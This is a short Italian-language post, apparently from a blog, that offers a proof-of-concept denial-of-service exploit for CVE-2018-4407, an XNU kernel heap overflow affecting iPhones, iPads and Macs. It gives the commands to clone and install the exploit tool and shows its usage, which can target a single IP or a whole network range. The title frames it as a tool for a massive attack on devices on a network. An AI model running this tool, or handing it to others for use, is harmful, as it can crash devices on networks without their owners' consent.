
IOS/MAC Denial-Of-Service [POC/EXPLOIT PER ATTACCO MASSICCIO A IOS/MAC IN RETE]
CVE-2018-4407 è un attacco BOF semplice e molto veloce contro IOS/MAC che può portare a DOS. La vulnerabilità è un heap buffer overflow nel codice di rete del kernel del sistema operativo XNU. XNU è usato sia da iOS che da macOS, ed è per questo che iPhone, iPad e Macbook sono tutti interessati.
apt-get install nmap
git clone https://github.com/r3dxpl0it/CVE-2018-4407.git && cd CVE-2018-4407 && pip install -r requirements.txt
usage: test.py [-h] [-s IP] [-p PLAYLOAD] target
positional arguments:
target Target Ip or Network Ip Range
optional arguments:
-h, --help show this help message and exit
-s IP, --sourceip IP Source Ip Adress
-p PLAYLOAD, --payload PLAYLOAD
Number of Payload Loop
]